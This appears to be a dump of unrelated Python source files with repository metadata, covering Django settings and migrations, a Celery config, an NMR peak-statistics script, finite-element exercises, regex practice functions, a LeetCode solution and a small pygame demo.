|
ae1bba4be20cb244ea93b306bd1a6124082a3c65
|
[] |
no_license
|
chernevik/python-sanity
|
9de267cb125a82ad336892ec5b6cb736a23bc430
|
849f212df509420d2b83c87d29a73faf13a7d477
|
refs/heads/master
| 2021-01-18T14:06:32.026238
| 2012-04-06T00:34:49
| 2012-04-06T00:34:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,060
|
py
|
#/usr/bin/python
# -*- coding: utf-8
#=============================================================================
# Imports
import unittest2
import sanity.formats.json_format as specificier
#=============================================================================
class SpecifierTest(unittest2.TestCase):
#---------------------------------------------------------------------
def test_basic(self):
s = specificier.Specificier(spec='basic.json')
self.assertTrue(isinstance(s.json, dict))
self.assertEqual(s.json['TestName'], 'WitchOrDuck')
self.assertEqual(s.TestName, 'WitchOrDuck')
self.assertEqual(
{u'url': u'/', u'method': u'GET'},
s.request
)
#---------------------------------------------------------------------
#=============================================================================
if __name__ == '__main__':
unittest2.main()
#=============================================================================
|
[
"gordon@practicalhorseshoeing.com"
] |
gordon@practicalhorseshoeing.com
|
c2434b2fb11ee9aa0070bcf9e30821461857f313
|
6a898e59343d0b3ea4f9580f489ef76d888b2b7e
|
/ecommerce/migrations/0028_auto_20180511_0449.py
|
cbda4df1aaf00a8a9f7564b2bb435064e9fe1db2
|
[] |
no_license
|
oujri/ecommerce
|
4b08b0316671e24206e810a38728d71c77fdc396
|
3fd8095dd2ed771a6951ed7fff08ca11ef0b94a1
|
refs/heads/master
| 2020-03-19T03:39:36.002373
| 2018-06-01T22:09:31
| 2018-06-01T22:09:31
| 135,749,651
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 845
|
py
|
# Generated by Django 2.0.4 on 2018-05-11 03:49
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('ecommerce', '0027_auto_20180511_0424'),
]
operations = [
migrations.RemoveField(
model_name='address',
name='user',
),
migrations.AddField(
model_name='billingaddress',
name='user',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='ecommerce.Profil'),
),
migrations.AddField(
model_name='shippingaddress',
name='user',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='ecommerce.Profil'),
),
]
|
[
"anass.urh@outlook.fr"
] |
anass.urh@outlook.fr
|
2f499a87544c0540ba44690864ef78272d33db8b
|
d90af0def0e29ebaebcf986399fcee65e1e2916c
|
/com_alias/noeout2txt
|
40e55f474367f57e12461898d4f86a7f367a2b25
|
[] |
no_license
|
Zaiyong/csrosetta
|
2fdbbdd7da24ce971f7f2297a7cd14723cdd59d6
|
539c60664dba3972062002ff4e636c7f029927cb
|
refs/heads/master
| 2020-12-25T15:18:39.274689
| 2020-02-25T09:15:35
| 2020-02-25T09:15:35
| 65,408,072
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,184
|
#!/usr/bin/env python2.7
##-*- mode:python;tab-width:2;indent-tabs-mode:t;show-trailing-whitespace:t;rm-trailing-spaces:t;python-indent:2 -*-'
from os.path import basename
import os
import string
import argparse
import sys
#sys.path.append('/home/zak/Downloads/numpy-1.6.2')
import library
import StringIO
from assignment import noesy
from math import *
#from noesy import CrossPeakInfo
#from noesy import CrossPeakList
#from noesy import Resonance
#from noesy import ResonanceList
from assignment.noesy import SpinSystem, get_strips,spinsystem_evaluation,ResonanceBase, ResonanceList
import fasta
import copy
from sets import Set
parser =argparse.ArgumentParser(description="assign noesy peaks",
add_help=True)
parser.add_argument("-peaks",nargs='*', help='NOE_out.dat with assigned peak-lists in xeasy format',default=None);
parser.add_argument("-split", type=int, dest='split_level', default=None);
parser.add_argument("-split_level", type=int, help='how deep should we split into individual file-names',default=0 );
parser.add_argument("-min_vc", default=0.5, type=float, help='in the last stage of autoNOE-Rosetta assignments with a volume contribution of less than 0.5 are usually ignored' )
library.add_standard_args( parser )
args = parser.parse_args()
class PeakCounter:
def __init__(self,indent=0):
self._indent=indent
self._VALUE_COL=80
def count_peak(self,p):
pass
def show_counter(self):
pass
def set_indent(self,val):
self._indent=val
def get_indent(self):
return self._indent
def str_indented(self,str,offset = 0,fillchar='.'):
indent=self._indent+offset
s=' '*indent+str
fill=self._VALUE_COL-len(s)
s+=fillchar*fill+'| '
return s
class FileNameCounter(PeakCounter):
def __init__(self,indent):
PeakCounter.__init__(self,indent)
self.files={}
def count_peak(self,p):
file=p.info().experiment_id()
self.files.setdefault(file,0)
self.files[file]+=1
def sum_count(self):
sum = 0
for v in self.files.itervalues():
sum+=v
return sum
def __str__(self):
s=''
if args.split_level==None or (args.split_level+1)*2>self.get_indent():
for f,v in self.files.iteritems():
s+='\n'+self.str_indented('in '+f,offset=2,fillchar=' ')+'%8d'%v
return s
class SimplePeakCounter(PeakCounter,FileNameCounter):
def __init__(self,indent,name):
PeakCounter.__init__(self,indent)
FileNameCounter.__init__(self,indent)
self._name=name
self._count=0
def __str__(self):
s=''
s+=CompoundCounter.__str__(self)
s+=FileNameCounter.__str__(self)
return s
def count_peak(self,p):
if self.applies(p):
self._count+=1
FileNameCounter.count_peak(self,p)
return True
return False
def applies(self,p):
pass
def __str__(self):
s=self.str_indented(self._name)
s+='%8d'%self._count
s+=FileNameCounter.__str__(self)
return s
def count(self):
return self._count
class CompoundCounter(PeakCounter,FileNameCounter):
def __init__(self,indent,name):
PeakCounter.__init__(self,indent)
FileNameCounter.__init__(self,indent)
self._reasons=[]
self._name=name
def append( self, counter ):
counter.set_indent(self.get_indent()+2)
self._reasons.append( counter )
def count_peak(self,p):
applied=False
for r in self._reasons:
applied=r.count_peak(p) or applied
if applied:
FileNameCounter.count_peak(self,p)
return applied
def __str__(self):
s=''
ct=0
for r in self._reasons:
ct+=r.count()
s+=self.str_indented(self._name)
s+='%8d'%ct
s+=FileNameCounter.__str__(self)
for r in self._reasons:
s+='\n%s'%r
return s
class UnassignedPeaks(CompoundCounter):
def __init__(self,indent):
name='unassigned'
CompoundCounter.__init__(self,indent,name)
class PickedCounter(SimplePeakCounter):
def __init__(self,indent):
SimplePeakCounter.__init__(self,indent,'picked')
def applies(self,p):
return True
class ZeroIntensityCounter(SimplePeakCounter):
def __init__(self,indent):
SimplePeakCounter.__init__(self,indent,'zero intensity')
def applies(self,p):
return p.volume()==0
class AssignedCounter(SimplePeakCounter):
def __init__(self,indent):
SimplePeakCounter.__init__(self,indent,'assigned')
def applies(self,p):
return p.nassign()>0 and not 'eliminated' in p.comment
class NoInitialAssignment(SimplePeakCounter):
def __init__(self,indent=0):
SimplePeakCounter.__init__(self,indent,'without assignment possibility')
def applies(self,p):
return p.nassign()==0
class Eliminated(SimplePeakCounter):
def __init__(self,why,indent=0):
SimplePeakCounter.__init__(self,indent,'eliminated due to '+why)
self._why=why
def applies(self,p):
return p.nassign()>=0 and 'eliminated' in p.comment and self._why in p.comment
class UniqueAssignments(SimplePeakCounter):
def __init__(self,indent):
SimplePeakCounter.__init__(self,indent,'with unique assignment')
def applies(self,p):
return p.nassign()==1 and not 'eliminated' in p.comment
class MultipleAssignments(SimplePeakCounter):
def __init__(self,indent):
SimplePeakCounter.__init__(self,indent,'with >=5 initial assignments')
def applies(self,p):
return p.nassign()>=5 and not 'eliminated' in p.comment
class IntraResidueAssignments(SimplePeakCounter):
def __init__(self,indent):
SimplePeakCounter.__init__(self,indent,'with intraresidue assignment')
def applies(self,peak):
if 'eliminated' in peak.comment or peak.nassign()==0: return False
min_seq_delta=100
for a in peak:
min_seq_delta=min(min_seq_delta,abs( a.atom(1).resid()-a.atom(2).resid() ))
return min_seq_delta==0
class ShortRangeAssignments(SimplePeakCounter):
def __init__(self,indent):
SimplePeakCounter.__init__(self,indent,'with sequential assignment |i-j|=1')
def applies(self,peak):
if 'eliminated' in peak.comment or peak.nassign()==0: return False
min_seq_delta=100
for a in peak:
min_seq_delta=min(min_seq_delta,abs( a.atom(1).resid()-a.atom(2).resid() ))
return min_seq_delta==1
class MediumRangeAssignments(SimplePeakCounter):
def __init__(self,indent):
SimplePeakCounter.__init__(self,indent,'with medium-range assignment 1<|i-j|<5')
def applies(self,peak):
if 'eliminated' in peak.comment or peak.nassign()==0: return False
min_seq_delta=100
for a in peak:
min_seq_delta=min(min_seq_delta,abs( a.atom(1).resid()-a.atom(2).resid() ))
return min_seq_delta > 1 and min_seq_delta <5
class LongRangeAssignments(SimplePeakCounter):
def __init__(self,indent):
SimplePeakCounter.__init__(self,indent,'with long-range assignment |i-j|>=5')
def applies(self,peak):
if 'eliminated' in peak.comment or peak.nassign()==0: return False
min_seq_delta=100
for a in peak:
min_seq_delta=min(min_seq_delta,abs( a.atom(1).resid()-a.atom(2).resid() ))
return min_seq_delta >= 5
class ViolationCounter(SimplePeakCounter):
def __init__(self,lo,hi=None,indent=0):
if not hi:
msg='above %3.1f A'%lo;
else:
msg='between %3.1f and %3.1f A'%(lo,hi);
SimplePeakCounter.__init__(self,indent,msg)
self._cutoff=lo
self._ignore=hi
def applies(self,p):
if p.nassign()==0: return False
start=p.comment.find('DistViol')
if start<0: return False
start=p.comment.find('>',start)
end=p.comment.find('A',start+1)
if start<0: return False
viol=float(p.comment[start+1:end])
return 'DistViol' in p.comment and viol >= self._cutoff and (not self._ignore or viol < self._ignore)
class AllViolationCounter(CompoundCounter):
def __init__(self,indent):
name='eliminated due to violations (DistViol)...'
CompoundCounter.__init__(self,indent,name)
self.append( ViolationCounter(0,0.5) )
self.append( ViolationCounter(0.5,2) )
self.append( ViolationCounter(2,5) )
self.append( ViolationCounter(5) )
initial_peak_stats=[]
peak_stats=[]
indent=2
peak_stats.append(PickedCounter(indent))
peak_stats.append(ZeroIntensityCounter(indent))
peak_stats.append(AssignedCounter(indent))
initial_peak_stats.append(MultipleAssignments(indent))
unassigned_counter=UnassignedPeaks(indent)
unassigned_counter.append( NoInitialAssignment() )
unassigned_counter.append( Eliminated('Network') )
unassigned_counter.append( Eliminated('MinPeakVol') )
unassigned_counter.append( Eliminated('DistViol') )
unassigned_counter.append( Eliminated('MaxAssign') )
peak_stats.append( unassigned_counter )
assign_stats=[]
assign_stats.append( UniqueAssignments(indent) )
assign_stats.append( IntraResidueAssignments(indent) )
assign_stats.append( ShortRangeAssignments(indent) )
assign_stats.append( MediumRangeAssignments(indent) )
assign_stats.append( LongRangeAssignments(indent) )
assign_stats.append( AllViolationCounter(indent) )
crosspeaks=noesy.read_peak_files(args.peaks)
import itertools
for peak in crosspeaks:
# print peak
for stat in initial_peak_stats:
stat.count_peak(peak)
if args.min_vc and args.min_vc>0:
op=copy.copy(peak)
peak.clear_assignments()
for a in op:
vc = a.volume_contribution()
if vc < args.min_vc:
continue
peak.add_assignment(a)
for stat in itertools.chain(peak_stats,assign_stats):
stat.count_peak(peak)
print 'Peaks:'
for stat in itertools.chain(peak_stats,initial_peak_stats):
print stat
print 'Assignments:'
for stat in assign_stats:
print stat
|
[
"zaiyong@jianings-MacBook-Air.local"
] |
zaiyong@jianings-MacBook-Air.local
|
|
cdd317914e0c97fedd74e5edd3234da9f79bb229
|
dc025df4a433b82c96fa7a4e064f46ecc948d1a2
|
/binary_tree_right_side_view.py
|
eea8357910654bf349af38a2f8072bfe778cc925
|
[] |
no_license
|
bingh0616/algorithms
|
c9d3babd6cbf3aefd40fa28a3c839c7201f1028c
|
3b16c72d9361c4bb063e4b2789db695f1e0149bf
|
refs/heads/master
| 2021-01-18T14:10:45.125905
| 2015-11-19T06:03:48
| 2015-11-19T06:03:48
| 35,512,148
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 844
|
py
|
# problem description: https://leetcode.com/problems/binary-tree-right-side-view/
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
# @param {TreeNode} root
# @return {integer[]}
def rightSideView(self, root):
q = collections.deque([])
if root: q.append(root)
res = []
curr_cnt = 1
next_cnt = 0
while q:
curr = q.popleft()
if curr.left: q.append(curr.left); next_cnt += 1
if curr.right: q.append(curr.right); next_cnt += 1
curr_cnt -= 1
if curr_cnt == 0:
res.append(curr.val)
curr_cnt = next_cnt
next_cnt = 0
return res
|
[
"bingh0616@gmail.com"
] |
bingh0616@gmail.com
|
70f25dc75dafc450b9bbde6a2976aa94936cb471
|
5b9420eb9cb1578c4baeee313e78c07a87e9e27c
|
/mandatory1/code/ex2.py
|
50b70026cbb04e6e1bae2c6b03e1a7716699caf9
|
[] |
no_license
|
christian-pedersen/mek4250
|
d612b803ee39c6dfe44d109bd7750165c12b39ad
|
afff12221e3f29e2b5e5d0f4789283167b293d69
|
refs/heads/master
| 2023-03-15T12:17:24.663547
| 2016-07-10T06:21:05
| 2016-07-10T06:21:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,554
|
py
|
# Mandatory assignment 1
# exercise 2
from dolfin import *
import numpy as np
import matplotlib.pyplot as plt
set_log_active(False)
def BC(mesh, V):
mf = FacetFunction("size_t", mesh)
mf.set_all(0)
class Left(SubDomain):
def inside(self, x, on_boundary):
return near(x[0], 0) and on_boundary
class Right(SubDomain):
def inside(self, x, on_boundary):
return near(x[0], 1) and on_boundary
class Bottom(SubDomain):
def inside(self, x, on_boundary):
return near(x[1], 0) and on_boundary
class Top(SubDomain):
def inside(self, x, on_boundary):
return near(x[1], 1) and on_boundary
left = Left()
left.mark(mf, 1)
right = Right()
right.mark(mf, 2)
bottom = Bottom()
bottom.mark(mf, 3)
top = Top()
top.mark(mf, 4)
#plot(mf,interactive=True)
leftBC = DirichletBC(V, Constant(0), mf, 1)
rightBC = DirichletBC(V, Constant(1), mf, 2)
BCs = [leftBC, rightBC]
return BCs
def numerical(mu, n, deg):
mesh = UnitSquareMesh(n, n)
V = FunctionSpace(mesh, 'CG', deg)
BCs = BC(mesh, V)
u = TrialFunction(V)
v = TestFunction(V)
eq = mu*inner(grad(u), grad(v))*dx + u.dx(0)*v*dx
u_ = Function(V)
solve(lhs(eq) == rhs(eq), u_, BCs)
return u_, V, mesh
def exact(mu):#, n, deg):
#mesh = UnitSquareMesh(n, n)
#V = FunctionSpace(mesh, 'CG', deg)
#BCs = BC(mesh, V)
exact = Expression('(exp(x[0]/mu) - 1) / (exp(1/mu) - 1)', mu=mu)
#u = interpolate(exact, V)
return exact
def task_b():
mu = [1, 0.1, 0.01, 0.002]
N = [8, 16, 32, 64]
deg = 1
error = np.zeros([len(mu),len(N)])
for m in range(len(mu)):
rate = np.zeros(len(N)-1)
for n in range(len(N)):
un, V, mesh = numerical(mu[m], N[n], deg)
ue = exact(mu[m])
V2 = FunctionSpace(mesh, 'CG', deg+2)
ue = interpolate(ue, V2)
error[m, n] = errornorm(ue, un)
if n > 0:
rate[n-1] = -np.log(error[m,n]/error[m,n-1]) / np.log(N[n]/N[n-1])
#plotname = 'u_numerical_mu'+str(m)
#wiz = plot(un, interactive=False)
#wiz.write_png(plotname)
print rate
print error
def task_c():
for normdeg in [1, 2]:
if normdeg == 1:
print 'Error norm L2'
else:
print 'Error norm H1'
for deg in [1, 2]:
print 'Polynomial order:',deg
for mu in [1, 0.1, 0.01, 0.002]:
N = [4, 8, 16, 32, 64, 128]
a = np.zeros(len(N))
y = np.zeros(len(N))
for n in range(len(N)):
u_num, V, mesh = numerical(mu, N[n], deg)
V2 = FunctionSpace(mesh, 'CG', deg+2)
u_ex = exact(mu)
u_ex = interpolate(u_ex, V2)
#plot(u_ex)
#plot(u_num)
#interactive()
if normdeg == 1:
A = errornorm(u_ex, u_num, 'l2')
#B = 0.5*((-k*np.pi)**2 + (-l*pi)**2)
#B = norm(u_ex, 'h1')
else:
A = errornorm(u_ex, u_num, 'h1')
#B = 0
#for i in range(normdeg):
# B += ((k*np.pi)**2 + (l*np.pi)**2)**i
y[n] = np.log(A)#/B)
a[n] = np.log(mesh.hmin())#np.log(1./(N[n]))
#plt.plot(a, y, 'o', label='points')
# solve system Ax = b
Am = np.zeros([2, 2])
b = np.zeros(2)
Am[0, 0] = len(N)
for i in range(len(N)):
Am[0, 1] += a[i]
Am[1, 0] += a[i]
Am[1, 1] += a[i]**2
b[0] += y[i]
b[1] += a[i]*y[i]
logC, alfa = np.linalg.solve(Am, b)
#print 'Polynomial order:',deg
print 'mu:',mu
print 'alpha:',alfa, ', C:',np.exp(logC)
f = lambda x: logC + alfa*x
x = np.linspace(a[0], a[-1], 101)
#plt.plot(x, f(x), label='lsq approximation')
#plt.legend(loc='upper left')
#plt.grid('on')
#plt.xlabel('log(h)'), plt.ylabel('log(||u - uh||)')
#plt.savefig('lsq_normdeg' +str(normdeg)+ '_polydeg' +str(deg)+ '_mu' +str(mu)+ '.png')
#plt.show()
def SUPG(mu, n, deg):
mesh = UnitSquareMesh(n, n)
V = FunctionSpace(mesh, 'CG', deg)
BCs = BC(mesh, V)
u = TrialFunction(V)
v = TestFunction(V)
beta = 0.5*mesh.hmin()
v = v + beta*v.dx(0)
eq = mu*inner(grad(u), grad(v))*dx + u.dx(0)*v*dx
u_ = Function(V)
solve(lhs(eq) == rhs(eq), u_, BCs)
#plot(u_, interactive=True)
return u_, mesh, V
def task_d():
# numerical error
for deg in [1]:
print ''
print 'Polynomial degree:',deg
print '------------------------'
for mu in [1.0, 0.1, 0.01, 0.002]:
print ''
print 'mu:', mu
N = [8, 16, 32, 64]
errorL2 = np.zeros(len(N))
errorH1 = np.zeros(len(N))
rateL2 = np.zeros(len(N)-1)
rateH1 = np.zeros(len(N)-1)
for n in range(len(N)):
unum, mesh, V = SUPG(mu, N[n], deg)
V2 = FunctionSpace(mesh, 'CG', deg+2)
uex = exact(mu)
uex = interpolate(uex, V2)
errorL2[n] = errornorm(uex, unum)
errorH1[n] = errornorm(uex, unum, 'h1')
if n == 0:
print 'N:',N[n],', L2 error:', errorL2[n], ', H1 error:',errorH1[n]
#plot(unum, interactive=True)
elif n > 0:
print 'N:',N[n],', L2 error:', errorL2[n], ', H1 error:',errorH1[n]
rateL2[n-1] = -np.log(errorL2[n]/errorL2[n-1]) / np.log(N[n]/N[n-1])
rateH1[n-1] = -np.log(errorH1[n]/errorH1[n-1]) / np.log(N[n]/N[n-1])
#plotname = '1D_deg_'+str(deg)+'_mu'+str(n)
#wiz = plot(unum, interactive=False)
#wiz.write_png(plotname)
print 'L2 convergence rate:', rateL2
print 'H1 convergence rate:', rateH1
#task_b()
#task_c()
#task_d()
#SUPG(0.002, 16, 1)
|
[
"christian_pedersen21@hotmail.com"
] |
christian_pedersen21@hotmail.com
|
c47001c1ab51e1ae3d183da4d7f294b8b89d784c
|
0545e8fe5a602f75a2ea150d0178c8db5a3c59d6
|
/go/settings.example.py
|
6e9f629635fd52e090ccd701536101e04b672e71
|
[] |
no_license
|
forgeries/go
|
c52849ace8d9df7d00254ecf8b4b1cb974bff0cb
|
44255a0dcf768415efd685340e26a7693dae4f8d
|
refs/heads/master
| 2021-09-15T04:40:11.476468
| 2018-05-26T07:23:48
| 2018-05-26T07:23:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,243
|
py
|
"""
Django settings for go project.
Generated by 'django-admin startproject' using Django 1.8.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# os.environ['DJANGO_SETTINGS_MODULE'] = 'mysite.settings'
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'login',
'captcha',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'go.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR,'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'go.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'go',
'HOST': 'localhost',
'USER': 'xxx',
'PASSWORD': 'xxx',
'PORT':'3306'
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
# LANGUAGE_CODE = 'en-us'
#
# TIME_ZONE = 'UTC'
#
# USE_I18N = True
#
# USE_L10N = True
#
# USE_TZ = True
LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'smtp.163.com'
EMAIL_PORT = 25
EMAIL_HOST_USER = 'xxx@163.com'
EMAIL_HOST_PASSWORD = 'xxx'
EMAIL_FROM = '花生宝贝<xxx@163.com>'
CONFIRM_DAYS = 7
|
[
"552388264@qq.com"
] |
552388264@qq.com
|
ac5e85e8b73484f3000a082e60602809d0f23ad9
|
663d5dc88b1b07599fd79665c45cf2831bdcf47f
|
/sol/solution (4)/main.py
|
e545ca81d9bf75e26b7e1e7cbf8ea1b4d486c1fd
|
[] |
no_license
|
l-arkadiy-l/some-examples
|
c5392ba1cf5cf6afbf8f887a39c8be3801595edc
|
616813129177724b12a910d8abe65119b085a8a1
|
refs/heads/main
| 2023-02-01T21:16:34.235364
| 2020-12-18T15:10:46
| 2020-12-18T15:10:46
| 322,626,753
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,705
|
py
|
import random
import pygame
class Boom(pygame.sprite.Sprite):
def __init__(self, pos, image, *group):
super(Boom, self).__init__(*group)
self.image = pygame.image.load('data/{}'.format(image))
# self.image.fill(pygame.Color('red'))
self.pos = pygame.Vector2(pos)
self.rect = self.image.get_rect()
print(self.rect.width)
self.image_boom = pygame.image.load('data/boom.png')
def update(self, *args):
if args and args[0].type == pygame.MOUSEBUTTONDOWN and \
self.rect.collidepoint(args[0].pos):
self.image = self.image_boom
pygame.init()
pygame.display.set_caption("Hero is moving!")
SIZE = WIDTH, HEIGHT = (500, 500)
screen = pygame.display.set_mode(SIZE)
all_sprites = pygame.sprite.Group()
for i in range(20):
# можно сразу создавать спрайты с указанием группы
bomb = Boom((0, 0), 'bomb.png')
# задаём случайное местоположение бомбочке
bomb.rect.x = random.randrange(WIDTH - bomb.rect.width)
bomb.rect.y = random.randrange(HEIGHT - bomb.rect.height)
all_sprites.add(bomb)
running = True
flipping = False
Clock = pygame.time.Clock()
while running:
for event in pygame.event.get():
# при закрытии окна
if event.type == pygame.QUIT:
running = False
all_sprites.update(event)
screen.fill(pygame.Color('black'))
all_sprites.draw(screen)
# screen.fill(pygame.Color('white'))
# screen.blit(bomb.image, (bomb.pos[0], bomb.pos[-1]))
pygame.display.flip()
Clock.tick(60)
|
[
"noreply@github.com"
] |
l-arkadiy-l.noreply@github.com
|
6733e5adc71aa5c82d018f128009f8ac5f45c9e7
|
df5184a4581cece37e8cde2a3ae647211e4b4d21
|
/src/config/celery.py
|
08783a9ac8394849083f94b3228c956c167c160b
|
[] |
no_license
|
miloszsobiczewski/Beholder
|
e2fa920d0233abb103ac406f709267cf754dd61d
|
cb523e928c91b7ee44fa201e0118477e61129305
|
refs/heads/master
| 2022-02-09T20:46:45.000558
| 2021-07-26T20:00:40
| 2021-07-26T20:00:40
| 240,501,693
| 0
| 0
| null | 2022-01-06T22:41:32
| 2020-02-14T12:19:04
|
Python
|
UTF-8
|
Python
| false
| false
| 565
|
py
|
import os
from celery import Celery
# set the default Django settings module for the 'celery' program.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings")
app = Celery("config")
# Using a string here means the worker doesn't have to serialize
# the configuration object to child processes.
# - namespace='CELERY' means all celery-related configuration keys
# should have a `CELERY_` prefix.
app.config_from_object("django.conf:settings", namespace="CELERY")
# Load task modules from all registered Django app configs.
app.autodiscover_tasks()
|
[
"sobiczewski.milosz@gmail.com"
] |
sobiczewski.milosz@gmail.com
|
e8e79a0ba665cfd8c009197b6ba367bd8c058fed
|
3a74764c3fc38f87cd2ed0ba9e96b23ad9a0677e
|
/bite_69/bite_69.py
|
fd3d78955afe129be34c1d79adc8d0c38e260367
|
[] |
no_license
|
nalwayv/bitesofpy
|
7dbc7cb55c9bc3c111f67243759cf56a2b785f51
|
56b0f7f85fd4b18d11a1b5df8da0a95e5ba2dcaa
|
refs/heads/master
| 2023-05-26T05:46:06.859108
| 2020-02-05T00:02:35
| 2020-02-05T00:02:35
| 216,651,358
| 2
| 0
| null | 2023-05-22T22:43:16
| 2019-10-21T19:41:25
|
HTML
|
UTF-8
|
Python
| false
| false
| 3,840
|
py
|
"""
Bite 69. Regex Fun - part II
"""
import re
from typing import List
def has_timestamp(text: str) -> bool:
"""Return True if text has a timestamp of this format:
2014-07-03T23:30:37"""
# has_stamp = 'INFO 2014-07-03T23:27:51 Shutdown initiated.'
if re.search(r'\d{4}-\d{2}-[0-9A-Z]+:[0-9]{2}:[0-9]{2}', text):
return True
return False
def is_integer(number: int) -> bool:
"""Return True if number is an integer"""
if re.search(r'^[0-9]+$|^-[0-9]+$', str(number)):
return True
return False
def has_word_with_dashes(text: str) -> bool:
"""Returns True if text has one or more words with dashes"""
if re.search(r'\w+-\w+', text):
return True
return False
def remove_all_parenthesis_words(text: str) -> str:
"""Return text but without any words or phrases in parenthesis:
'Good morning (afternoon)' -> 'Good morning' (so don't forget
leading spaces)"""
pattern = re.compile(r'(\(.*?\))')
return pattern.sub(r'~', text).replace(" ~", "")
def split_string_on_punctuation(text: str) -> List[str]:
"""Split on ?!.,; - e.g. "hi, how are you doing? blabla" ->
['hi', 'how are you doing', 'blabla']
(make sure you strip trailing spaces)"""
return [
v.strip()
for v in re.split(r'[!\"#$%&\'()*+,-.\/:;<=>?@\[\\\]^_`{|}~]', text)
if v != ''
]
def remove_duplicate_spacing(text: str) -> str:
"""Replace multiple spaces by one space"""
pattern = re.compile(r'\s{1,}')
return pattern.sub(r' ', text)
def has_three_consecutive_vowels(word: str) -> bool:
"""Returns True if word has at least 3 consecutive vowels"""
if re.search(r'[aeiou]{3,}', word):
return True
return False
def convert_emea_date_to_amer_date(date: str) -> str:
"""Convert dd/mm/yyyy (EMEA date format) to mm/dd/yyyy
(AMER date format)"""
_date = re.findall(r'(\d.*?)/(\d.*?)/(\d{4})', date)
if _date:
day, month, year = _date[0]
return f"{month}/{day}/{year}"
return 'none'
if __name__ == "__main__":
print(f"- STAMP {'-'*45}")
print(has_timestamp('INFO 2014-07-03T23:27:51 Shutdown initiated.'))
print(has_timestamp('INFO 2014-06-01T13:28:51 Shutdown initiated.'))
print(has_timestamp('INFO 2014-7-3T23:27:51 Shutdown initiated.'))
print(has_timestamp('INFO 2014-07-03t23:27:1 Shutdown initiated.'))
print(f"- INT {'-'*45}")
print(is_integer(1))
print(is_integer(-1))
print(is_integer('str'))
print(is_integer(1.1))
print(f"- DASHES {'-'*45}")
print(has_word_with_dashes('this Bite is self-contained'))
print(has_word_with_dashes('the match ended in 1-1'))
print(has_word_with_dashes('this Bite is not selfcontained'))
print(has_word_with_dashes('the match ended in 1- 1'))
print(f"- REPLACE {'-'*45}")
for a, b in [('good morning (afternoon), how are you?',
'good morning, how are you?')]:
print(remove_all_parenthesis_words(a) == b)
for a, b in [('math (8.6) and science (9.1) where his strengths',
'math and science where his strengths')]:
print(remove_all_parenthesis_words(a) == b)
print(f"- SPLIT {'-'*45}")
print(split_string_on_punctuation('hi, how are you doing? blabla'))
print(
split_string_on_punctuation(';String. with. punctuation characters!'))
print(f"- DUPLICATE SPACEING {'-'*45}")
print(
remove_duplicate_spacing(
'This is a string with too much spacing'))
print(f"- 3 VOWELS {'-'*45}")
for word in ['beautiful', 'queueing', 'mountain', 'house']:
print(has_three_consecutive_vowels(word))
print(f"- DATE {'-'*45}")
print(convert_emea_date_to_amer_date('31/03/2018'))
print(convert_emea_date_to_amer_date('none'))
|
[
"nalwayv@googlemail.com"
] |
nalwayv@googlemail.com
|
9a94c24fa6adb96b19038922aa59abc025baf07d
|
201c3db3d299acf32ac8e44f7d93d9f48aeb4708
|
/lstm2.py
|
7b5751b60b75eb5590b611713e7d7e15c8917133
|
[] |
no_license
|
PKUSZ-PR/LastWorkofPR
|
a31d4e7d9d9512498b2bd1fc7e45657d1a7da1fa
|
eea41366647c345666046025d4e43d3f9b151dfe
|
refs/heads/master
| 2021-05-14T14:59:58.525460
| 2018-01-03T11:03:21
| 2018-01-03T11:03:21
| 115,981,325
| 0
| 0
| null | null | null | null |
UTF-8
|
